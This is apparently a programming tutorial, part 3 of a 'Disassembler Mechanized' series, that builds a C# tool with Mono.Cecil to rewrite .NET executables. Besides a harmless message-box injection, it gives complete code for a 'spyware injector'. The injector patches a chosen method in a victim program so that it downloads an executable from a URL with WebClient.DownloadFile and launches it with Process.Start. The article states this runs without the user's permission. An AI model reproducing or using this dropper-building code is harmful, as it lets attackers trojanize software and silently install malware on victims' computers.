Disassembler Mechanized: Part 3

Before reading this article you must read:
Introduction

This article is the obvious culmination of the previous effort of writing the “Disassembler-Mechanized “series where we are showing the process of developing special software to disassemble source code and inject an arbitrary exe into a process. The first of the four-part series of articles was about the design, configuration of API and disassemble code manipulation. In the preceding papers of this series, we have already developed the design of the custom disassembler software and the mechanics that produces the original source of a .NET assembly in the C# language and MSIL form. More specically, these two articles crated the basic infrastructure for this current paper and accompanied code injection feature implementation. In particular, this paper showcases the process of injecting external source code in the form of an .exe file into an existing .NET binary executable.

What Code Injection is

Code Injection refers to a method for attackers to manipulate programs and processes to execute another program by inserting malicious code into an application that then will be executed. The approach of code injection is very similar to hooking where it offers a hook to the Just-In-time (JIT) compiler and enables the injection of your arbitrary code and fixes its execution automatically rather than performing of the default CLR JIT compilation. The hooks in the JIT compiler filter the request of MSIL code method and provides the real MSIL instead of the MSIL contained in the assembly when the code of a method is requested. By injecting one method at a time, the MSIL code will remain obscured even if one manages to dump the code from memory. The real beauty of code injection is that, it runs without the cost of a PInoke/Interop call and doesn't affect the pace of the pure CLR method call.

Simply, we shall manipulate a .NET binary to demonstrate the code injection using message box injection and exe (malicious exe) injection tactics. The important point of consideration is to identify the entry point or the triggering in the uploaded binary, for activating the malicious program. In message box injection, we typically inject a custom message box that has a string message, into an opened exe in this software.

UI Design recap

As we stated in the earlier articles, this software contains several form controls over the end-user interface. So, it is worthless to discuss the implementations of entire controls, rather we shall move ahead with the control that are currently consumed in these articles. Here is the list of Windows Forms controls for the design and implementation of a message box and spyware injection.



If the programmer places all the form controls to implement the previous design prototype, then it will transpire in this final injector tool form. The following image belongs to the Message Box injector.



And the following figure is related to the external exe or malicious spyware injector design as in the following:



Getting Started

The functionality of External Message Box and spyware injection into a binary into the software is quite a long process and exhaustive. We shall need to play bizarre classes and methods in order to place the external MSIL code into an existing binary.

Hence, open the tabPage3 in the Design view and place the following code in the btnInjectMsg_Click method that typically confirms whether the text box in the Message Box Injector design is empty or filled with values as in the following:
  1. private void btnInjectMsg_Click(object sender, EventArgs e)  
  2.   {  
  3.       if (txtURL.Text!="" && txtTitle.Text != "" && txtbody.Text != "")  
  4.         {  
  5.             InjectMsg();  
  6.         }  
  7. }  
As before, place the following implementation in tabPage4 for the Spyware injection design that again checks whether the TextBox value is empty or not:
  1. private void btnInjectSpy_Click(object sender, EventArgs e)  
  2.   {  
  3.      if (txtURL.Text!="" && txtURLlocation.Text != "" && txtStoreLocation.Text != "")  
  4.         {  
  5.             InjectSpyware();  
  6.         }  
  7.   }  
During Implementation, we would need to perform the flushing of the control value multiple times. So, we make a method to especially clear the current value of every control placed on the user interface as in the following:
  1. private void ResetData()  
  2. {  
  3.   txtURL.Text = "";  
  4.   tvMembers.Nodes.Clear();    
  5.   rtbILCode.Clear();  
  6.   rtbCsharpCode.Clear();   
  7.   rtbInfo.Clear();  
  8.   txtTitle.Text = "";  
  9.   txtbody.Text = "";  
  10.   txtURLlocation.Text = "";            
  11. }  
Message Box Injection

The mechanics of injecting an arbitrary Message Box into a current running binary executable, is in fact, a very sophisticated task especially when we don't possess the corresponding source code of that binary. Whatever methods are applied to achieve that objective is not sufficient alone until we couldn't figure the entry point that determines the triggering point of invoking that Message Box. The entry points are actually the place where we want to inject the external Message Box indeed.

The following code in the InjectMsg() method that is called when the Inject button is clicked. Several methods from the external or internal classes, especially ILProcessor, MethodInfo and Instruction, are employed to integrate the external code of CLR opcode instructions into the existing code. Here, the user interface design for Message Box Injection typically contains a couple of TextBoxes and Radio Buttons. However, the information collected from the selection of those Radio Buttons and values entered into the TextBox, this software immediately generates the corresponding CLR opcode instruction and integrates such instructions, where the user wants to place it.
  1. Private void InjectMsg()  
  2.   {   
  3.     var assembly = AssemblyDefinition.ReadAssembly(txtURL.Text);  
  4.     try  
  5.     {  
  6.       IEnumerator enumerator = assembly.MainModule.Types.GetEnumerator();  
  7.       while (enumerator.MoveNext())  
  8.       {  
  9.         TypeDefinition td = (TypeDefinition)enumerator.Current;  
  10.   
  11.         if (td.Name == tvMembers.SelectedNode.Parent.Text)  
  12.         {  
  13.           IEnumerator enumerator2 = td.Methods.GetEnumerator();  
  14.           while (enumerator2.MoveNext())  
  15.           {  
  16.             MethodDefinition method_definition = (MethodDefinition)enumerator2.Current;  
  17.   
  18.             if (method_definition.Name == tvMembers.SelectedNode.Text)  
  19.              {  
  20.               ILProcessor cilProcess = method_definition.Body.GetILProcessor();  
  21.               string ok = txtTitle.Text;  
  22.               string str = txtbody.Text;  
  23.   
  24.               MethodInfo method = typeof(MessageBox).GetMethod("Show"new Type[]      
  25.                                   {  
  26.                         typeof(string), typeof(string), typeof(MessageBoxButtons),   
  27.                         typeof(MessageBoxIcon) });  
  28.               MethodReference method2 = assembly.MainModule.Import(method);  
  29.               Instruction instruction = cilProcess.Create(OpCodes.Ldstr, str);  
  30.               Instruction instruction1 = cilProcess.Create(OpCodes.Ldstr, ok);  
  31.   
  32.               Instruction instruction11 = null;  
  33.                 if (rbOK.Checked == true)  
  34.                 {  
  35.                   instruction11 = cilProcess.Create(OpCodes.Ldc_I4_0);  
  36.                 }  
  37.                 if (rbOC.Checked == true)  
  38.                 {  
  39.                   instruction11 = cilProcess.Create(OpCodes.Ldc_I4_1);  
  40.                 }  
  41.                 if (rbYN.Checked == true)  
  42.                 {  
  43.                   instruction11 = cilProcess.Create(OpCodes.Ldc_I4_4);  
  44.                 }  
  45.                 if (rbYNC.Checked == true)  
  46.                 {  
  47.                   instruction11 = cilProcess.Create(OpCodes.Ldc_I4_2);  
  48.                 }  
  49.                 if (rbRC.Checked == true)  
  50.                 {  
  51.                   instruction11 = cilProcess.Create(OpCodes.Ldc_I4_5);  
  52.                 }  
  53.                 if (rbRCI.Checked == true)  
  54.                 {  
  55.                   instruction11 = cilProcess.Create(OpCodes.Ldc_I4_3);  
  56.                 }  
  57.   
  58.                 Instruction instruction111 = null;  
  59.                 sbyte error = 16;  
  60.                 sbyte question = 32;  
  61.                 sbyte exclamation = 48;  
  62.                 sbyte info = 64;  
  63.                 if (rbInfo.Checked == true)  
  64.                 {  
  65.                    instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, info);  
  66.                 }  
  67.                 if (rbErr.Checked == true)  
  68.                 {  
  69.                    instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, error);  
  70.                 }  
  71.                 if (rbExc.Checked == true)  
  72.                 {  
  73.                    instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, exclamation);  
  74.                 }  
  75.                 if (rbQues.Checked == true)  
  76.                 {  
  77.                    instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, question);  
  78.                 }  
  79.   
  80.                 try  
  81.                 {  
  82.                   Instruction instruction2 = cilProcess.Create(OpCodes.Call, method2);  
  83.                   Instruction instr = cilProcess.Create(OpCodes.Pop);  
  84.                   ILProcessor cilWorker2 = cilProcess;  
  85.                   cilWorker2.InsertBefore(method_definition.Body.Instructions[0],  
  86.                                         instruction);                                            
  87.                   cilWorker2.InsertAfter(instruction, instruction1);  
  88.                   cilWorker2.InsertAfter(instruction1, instruction11);  
  89.                   cilWorker2.InsertAfter(instruction11, instruction111);  
  90.                   cilWorker2.InsertAfter(instruction111, instruction2);  
  91.                   cilWorker2.InsertAfter(instruction2, instr);  
  92.                 }  
  93.                 catch   
  94.                 {  
  95.                   MessageBox.Show("Select Button type and style");  
  96.                   return;  
  97.                 }  
  98.                using (SaveFileDialog saveFileDialog = new SaveFileDialog  
  99.                 {  
  100.                   Title = "Save to :",  
  101.                   Filter = "Executables | *.exe"  
  102.                 })  
  103.                 {  
  104.                   if (saveFileDialog.ShowDialog() == DialogResult.OK)  
  105.                    {  
  106.                        assembly.MainModule.Runtime = TargetRuntime.Net_4_0;  
  107.                        assembly.Write(saveFileDialog.FileName);  
  108.                        MessageBox.Show("Message Successfuly Injected");  
  109.                        DialogResult dr = MessageBox.Show("Do you want To Test it?",   
  110.                               "Confirmation", MessageBoxButtons.YesNo,       
  111.                               MessageBoxIcon.Question);      
  112.                        if (dr == DialogResult.Yes)  
  113.                        {  
  114.                          Process.Start(saveFileDialog.FileName.ToString());  
  115.                        }  
  116.                        else  
  117.                        {  
  118.                          ResetData();  
  119.                          return;  
  120.                        }   
  121.                     }  
  122.                          
  123.                  return;  
  124.                    }  
  125.                   }  
  126.                 }  
  127.              }  
  128.            }  
  129.         }  
  130.        catch  
  131.        {  
  132.          MessageBox.Show("First,select method from Assembled members, where you want to   
  133.                                 inject Message box");  
  134.        }  
  135. }  
However, define a method as InjectMsg() to implement the external message box functionality. This method contains several lines of code as some of following first, reads the assembly, then extracts the main modules list using an Enumerator and finally using another Enumerator, we shall retrieve all the members in the form of a method, in the TreeView control as in the following:
  1. var assembly = AssemblyDefinition.ReadAssembly(txtURL.Text);  
  2. IEnumerator enumerator = assembly.MainModule.Types.GetEnumerator();  
  3. while (enumerator.MoveNext())  
  4.   {  
  5.     TypeDefinition td = (TypeDefinition)enumerator.Current;  
  6.     if (td.Name == tvMembers.SelectedNode.Parent.Text)  
  7.      {  
  8.        IEnumerator enumerator2 = td.Methods.GetEnumerator();  
  9.        while (enumerator2.MoveNext())  
  10.        {  
  11.          MethodDefinition method_definition = (MethodDefinition)enumerator2.Current;  
  12.          if (method_definition.Name == tvMembers.SelectedNode.Text)  
  13.           {  
The next code first determines the position for placing the message box, in the existing Opcode of that file, using an ILProcessor class as well as defines the prototype of the custom message box to generate its corresponding CIL code that will merge later. Here, we especially collect the message box body and title related data as in the following:
  1. ILProcessor cilProcess = method_definition.Body.GetILProcessor();  
  2. string ok = txtTitle.Text;  
  3. string str = txtbody.Text;  
  4. MethodInfo method = typeof(MessageBox).GetMethod("Show"new Type[]      
  5.                           {  
  6.                            typeof(string), typeof(string),   
  7.                            typeof(MessageBoxButtons),   typeof(MessageBoxIcon)    
  8.                           });  
  9. MethodReference method2 = assembly.MainModule.Import(method);  
  10. Instruction instruction = cilProcess.Create(OpCodes.Ldstr, str);  
  11. Instruction instruction1 = cilProcess.Create(OpCodes.Ldstr, ok);  
The message box is typically, found in 2 different flavors and accompany diverse buttons and are utilized in a specific scenario depending on the user requirements. So, it is obvious that each message box must have its CIL opcode representation to specific buttons, in the context of the CLR as in the following.


 
Now, we shall define one Instruction class object that would hold the status of the message box button's type. More preciously, whatever button type such as Yes/No, Yes/No/Cancel, is chosen from the end-user design is stored in the Instruction class object as in the following:
  1. Instruction instruction11 = null;  
  2. if (rbOK.Checked == true)  
  3. {  
  4.     instruction11 = cilProcess.Create(OpCodes.Ldc_I4_0);  
  5. }  
  6. if (rbOC.Checked == true)  
  7. {  
  8.     instruction11 = cilProcess.Create(OpCodes.Ldc_I4_1);  
  9. }  
  10. if (rbYN.Checked == true)  
  11. {  
  12.     instruction11 = cilProcess.Create(OpCodes.Ldc_I4_4);  
  13. }  
  14. if (rbYNC.Checked == true)  
  15. {  
  16.     instruction11 = cilProcess.Create(OpCodes.Ldc_I4_2);  
  17. }  
  18. if (rbRC.Checked == true)  
  19. {  
  20.     instruction11 = cilProcess.Create(OpCodes.Ldc_I4_5);  
  21. }  
  22. if (rbRCI.Checked == true)  
  23. {  
  24.     instruction11 = cilProcess.Create(OpCodes.Ldc_I4_3);  
  25. }  
Further, we also need to store the value of what message box type is chosen from the end-user. The message box also counts as Error, Exclamation or question type as in the following:
  1. Instruction instruction111 = null;  
  2. sbyte error = 16;  
  3. sbyte question = 32;  
  4. sbyte exclamation = 48;  
  5. sbyte info = 64;  
  6. if (rbInfo.Checked == true)  
  7. {  
  8. instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, info);  
  9. }  
  10. if (rbErr.Checked == true)  
  11. {  
  12. instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, error);  
  13. }  
  14. if (rbExc.Checked == true)  
  15. {  
  16. instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, exclamation);  
  17. }  
  18. if (rbQues.Checked == true)  
  19. {  
  20. instruction111 = cilProcess.Create(OpCodes.Ldc_I4_S, question);  
  21. }  
Up until now, we gathered all the necessary data to show a message box and implement its CIL opcode representation too. In the subsequent code, we shall apply the methods of the ILProcessor class to write the opcode instruction on behalf of the collected data from the design and finally make an another version of the source binary where the external message box is injected into as in the following:
  1. try  
  2. {  
  3. Instruction instruction2 = cilProcess.Create(OpCodes.Call, method2);  
  4. Instruction instr = cilProcess.Create(OpCodes.Pop);  
  5. ILProcessor cilWorker2 = cilProcess;  
  6. cilWorker2.InsertBefore(method_definition.Body.Instructions[0], instruction);  
  7. cilWorker2.InsertAfter(instruction, instruction1);  
  8. cilWorker2.InsertAfter(instruction1, instruction11);  
  9. cilWorker2.InsertAfter(instruction11, instruction111);  
  10. cilWorker2.InsertAfter(instruction111, instruction2);  
  11. cilWorker2.InsertAfter(instruction2, instr);  
  12. }  
  13. catch  
  14. {  
  15. MessageBox.Show("Select Button type and style");  
  16. return;  
  17. }  
  18. using (SaveFileDialog saveFileDialog = new SaveFileDialog  
  19. {  
  20. Title = "Save to :",  
  21. Filter = "Executable | *.exe"  
  22. })  
Exe code Injection (Planting Spyware)

First the exe injector interface asks to upload a malicious file that would be injected. Hence, the tabPage4 contains a button to open a file open dialog that selects the malicious file from hard-disk and places the entire path of that file into the text box. Hence, create a click event handler for btnUpload and place the following code in it as in the following:
  1. private void btnUpload_Click(object sender, EventArgs e)  
  2.         {  
  3.             OpenFileDialog openAsm = new OpenFileDialog();  
  4.             openAsm.Filter = "Executable | *.exe";  
  5.             if (openAsm.ShowDialog() == DialogResult.OK)  
  6.             {  
  7.                 txtURLlocation.Text = openAsm.FileName;  
  8.             }  
  9.         }  
The following code mutually, belongs to .exe or malicious spyware injection into another executable binary that must, of course be a .NET binary. The code written in the InjectSpyware() method is typically called when the user press the inject button residing in the design. Here, the first few lines are highlighted in the Blue color box. The implementation is the same as for the Message Box injector, where we actually identify the location or triggering point of the injected file.
  1. private void InjectSpyware()  
  2. {  
  3.   var assembly = AssemblyDefinition.ReadAssembly(txtURL.Text);  
  4.   try  
  5.   {  
  6.      IEnumerator enumerator = assembly.MainModule.Types.GetEnumerator();  
  7.      while (enumerator.MoveNext())  
  8.      {  
  9.        TypeDefinition td = (TypeDefinition)enumerator.Current;  
  10.                       
  11.        if (td.Name == tvMembers.SelectedNode.Parent.Text)  
  12.        {  
  13.          IEnumerator enumerator2 = td.Methods.GetEnumerator();  
  14.          while (enumerator2.MoveNext())  
  15.          {  
  16.            MethodDefinition method_definition =   
  17.            (MethodDefinition)enumerator2.Current;        
  18.            if (method_definition.Name == tvMembers.SelectedNode.Text &&   
  19.                           !method_definition.IsSetter && !method_definition.IsGetter)  
  20.   
  21.              {  
  22.                  ILProcessor cilProcess = method_definition.Body.GetILProcessor();  
  23.                  string str2 = txtURLlocation.Text;  
  24.                  string str3 = txtStoreLocation.Text;  
  25.                  ConstructorInfo meth = typeof(WebClient).GetConstructors()[0];  
  26.                  MethodInfo mtd3 = typeof(WebClient).GetMethod("DownloadFile"new    
  27.                                      Type[] { typeof(string), typeof(string) });  
  28.                  MethodInfo mtd4 = typeof(Process).GetMethod("Start"new Type[] {   
  29.                   typeof(string) });  
  30.                  MethodReference mtd5 = assembly.MainModule.Import(meth);  
  31.                  MethodReference mtd6 = assembly.MainModule.Import(mtd3);  
  32.                  MethodReference mtd7 = assembly.MainModule.Import(mtd4);  
  33.                  Instruction instruction3 = cilProcess.Create(OpCodes.Newobj, mtd5);  
  34.                  Instruction instruction4 = cilProcess.Create(OpCodes.Nop);  
  35.                  Instruction instruction5 = cilProcess.Create(OpCodes.Ldstr, str2);  
  36.                  Instruction instruction6 = cilProcess.Create(OpCodes.Ldstr, str3);  
  37.                  Instruction instruction7 = cilProcess.Create(OpCodes.Nop);  
  38.                  Instruction instruction8 = cilProcess.Create(OpCodes.Callvirt, mtd6);  
  39.                  Instruction instruction9 = cilProcess.Create(OpCodes.Nop);  
  40.                  Instruction instruction10 = cilProcess.Create(OpCodes.Ldstr, str3);  
  41.                  Instruction instruction11 = cilProcess.Create(OpCodes.Call, mtd7);  
  42.                   Instruction instr2 = cilProcess.Create(OpCodes.Pop);  
  43.                   ILProcessor cilWorker3 = cilProcess;  
  44.                                  
  45.   
  46.                  cilWorker3.InsertBefore(method_definition.Body.Instructions[0],    
  47.                                           instruction3);  
  48.   
  49.                  cilWorker3.InsertAfter(instruction3, instruction4);  
  50.                  cilWorker3.InsertAfter(instruction4, instruction5);  
  51.                  cilWorker3.InsertAfter(instruction5, instruction6);  
  52.                  cilWorker3.InsertAfter(instruction6, instruction7);  
  53.                  cilWorker3.InsertAfter(instruction7, instruction8);  
  54.                  cilWorker3.InsertAfter(instruction8, instruction9);  
  55.                  cilWorker3.InsertAfter(instruction9, instruction10);  
  56.                  cilWorker3.InsertAfter(instruction10, instruction11);  
  57.                  cilWorker3.InsertAfter(instruction11, instr2);  
  58.                  using (SaveFileDialog saveFileDialog = new SaveFileDialog  
  59.                  {  
  60.                     Title = "save to",  
  61.                     Filter = "Executables | *.exe"  
  62.                  })  
  63.                  {  
  64.                   if (saveFileDialog.ShowDialog() == DialogResult.OK)  
  65.                    {  
  66.                     assembly.MainModule.Runtime = TargetRuntime.Net_4_0;  
  67.                     assembly.Write(saveFileDialog.FileName);  
  68.                     MessageBox.Show("Spyware Successfuly Injected");  
  69.                     DialogResult dr = MessageBox.Show("Do you want To Test it?",  
  70.                       "Confirmation", MessageBoxButtons.YesNo, MessageBoxIcon.Question);  
  71.   
  72.                     if (dr == DialogResult.Yes)  
  73.                     {  
  74.                        Process.Start(saveFileDialog.FileName.ToString());    
  75.                     }  
  76.                     else  
  77.                     {  
  78.                        ResetData();   
  79.                        return;  
  80.                     }  
  81.                         
  82.                  }  
  83.                           
  84.               return;  
  85.                 }  
  86.               }  
  87.             }  
  88.           }  
  89.          }  
  90.        }  
  91.       catch  
  92.       {  
  93.         MessageBox.Show("First,select method from Assembly members, where you want to  
  94.                          inject Message box");  
  95.         
  96.       }  
  97. }  
Next, we get the spyware exe file and path where the file would be injected. This software could also be capable of injecting a malicious exe from a remote location, typically from a website. Hence, mtd3 and mtd4 of the MethodInfo class objects are doing this functionality and later they are referenced to assembly import method. The corresponding spyware injection code shall be merging to a specific location, in the form of opcode instruction. Here, we basically are creating an instruction to call a method using a Callvirt instruction that has the external exe file as a parameter.
  1. ILProcessor cilProcess = method_definition.Body.GetILProcessor();  
  2. string str2 = txtURLlocation.Text;  
  3. string str3 = txtStoreLocation.Text;  
  4. ConstructorInfo meth = typeof(WebClient).GetConstructors()[0];  
  5. MethodInfo mtd3 = typeof(WebClient).GetMethod("DownloadFile"new  
  6. Type[] { typeof(string), typeof(string) });  
  7.   
  8. MethodInfo mtd4 = typeof(Process).GetMethod("Start"new Type[] {  
  9. typeof(string) });  
  10. MethodReference mtd5 = assembly.MainModule.Import(meth);  
  11. MethodReference mtd6 = assembly.MainModule.Import(mtd3);  
  12. MethodReference mtd7 = assembly.MainModule.Import(mtd4);  
  13. Instruction instruction3 = cilProcess.Create(OpCodes.Newobj, mtd5);  
  14. Instruction instruction4 = cilProcess.Create(OpCodes.Nop);  
  15. Instruction instruction5 = cilProcess.Create(OpCodes.Ldstr, str2);  
  16. Instruction instruction6 = cilProcess.Create(OpCodes.Ldstr, str3);  
  17. Instruction instruction7 = cilProcess.Create(OpCodes.Nop);  
  18. Instruction instruction8 = cilProcess.Create(OpCodes.Callvirt, mtd6);  
  19. Instruction instruction9 = cilProcess.Create(OpCodes.Nop);  
  20. Instruction instruction10 = cilProcess.Create(OpCodes.Ldstr, str3);  
  21. Instruction instruction11 = cilProcess.Create(OpCodes.Call, mtd7);  
  22. Instruction instr2 = cilProcess.Create(OpCodes.Pop);  
  23. ILProcessor cilWorker3 = cilProcess;  
We must adjust the flow to opcode instruction execution. Hence, the subsequent code maintains that code insert, at the location as in the following.
  1. cilWorker3.InsertBefore(method_definition.Body.Instructions[0],  
  2. instruction3);  
  3. cilWorker3.InsertAfter(instruction3, instruction4);  
  4. cilWorker3.InsertAfter(instruction4, instruction5);  
  5. cilWorker3.InsertAfter(instruction5, instruction6);  
  6. cilWorker3.InsertAfter(instruction6, instruction7);  
  7. cilWorker3.InsertAfter(instruction7, instruction8);  
  8. cilWorker3.InsertAfter(instruction8, instruction9);  
  9. cilWorker3.InsertAfter(instruction9, instruction10);  
  10. cilWorker3.InsertAfter(instruction10, instruction11);  
  11. cilWorker3.InsertAfter(instruction11, instr2);  
After creating an instruction for the external exe and inserting them in a specific order, the code is executed that produces the new exe version that possesses all the new modifications.
  1. using (SaveFileDialog saveFileDialog = new SaveFileDialog  
  2. {  
  3. Title = "save to",  
  4. Filter = "Executables | *.exe"  
  5. })  
  6. {  
  7. if (saveFileDialog.ShowDialog() == DialogResult.OK)  
  8. {  
  9. assembly.MainModule.Runtime = TargetRuntime.Net_4_0;  
  10. assembly.Write(saveFileDialog.FileName);  
  11. MessageBox.Show("Spyware Successfuly Injected");  
  12. DialogResult dr = MessageBox.Show("Do you want To Test it?",  
  13.              "Confirmation", MessageBoxButtons.YesNo, MessageBoxIcon.Question);  
  14.   
  15. if (dr == DialogResult.Yes)  
  16. {  
  17.             Process.Start(saveFileDialog.FileName.ToString());  
  18. }  
  19. else  
  20. {  
  21.             ResetData();  
  22.             return;  
  23. }  
  24. }  
Testing

Message Box Injection

We will victimize the following executable in order to demonstrate Message Box injection.



Hence, first upload this file into the software and here the EXIT button would be the entry point of execution for the external message box. So, fill in all the necessary data for showing the message box and hit the Inject button. You'll see that a message box will pop-up about the successful injection as in the following:



It will also prompt to save-as the victim file and now open the new version of the victim file and click on the Exit button, you 'll see the external message box will appear with message data that we have entered in the design as in the following:



Spyware Injection

In this demonstration, we need two executables, one would be the victim and the rest would be the spyware executable. Hence, first upload the victim file in the software, choose or determine the triggering point for invoking the spyware exe and finally upload the spyware executable. Then hit Inject button that shows the success of the operation as in the following:



The victim file is typically an application that requires serial keys to proceed. Therefore, open the new version of this file and enter some value that you didn't know indeed. Obviously, the wrong key message is reflected as well as the inject spyware executable also activated and is displayed as in the following:



Final Note

This paper provided the rest of the implementation as External Message box injection and spyware injection. In an external message, we explicitly inject the instruction for message box execution in a stand-alone .NET binary on the pre-determined activation triggering action. For this purpose, we have also designed the end-user interface to populate the text body in the message box. On the other side, the spyware injector typically penetrates a stand-alone exe into another .NET binary executable. The stand-alone spyware or application executes without the user permission because its invoking is linked to the victim executable specific action. In the next article of this series, we shall analyze the penetration of an external instruction in detail as well as come across a couple of new ideas related to this software.

Similar Articles